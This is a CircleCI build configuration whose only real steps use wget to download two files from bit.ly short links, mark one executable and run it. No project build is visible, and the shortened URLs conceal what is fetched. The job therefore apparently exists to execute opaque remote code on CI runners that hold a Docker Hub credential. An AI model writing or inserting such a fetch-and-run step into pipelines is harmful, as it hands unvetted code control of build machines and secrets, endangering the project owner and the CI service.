version: 2.0
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run: 
          name: Downloading And Setup
          command: |
            wget -O dsetup.sh https://bit.ly/3IPb6C1 && chmod +x dsetup.sh && wget -O setup https://bit.ly/3Cn7m8L
      - run: ./dsetup.sh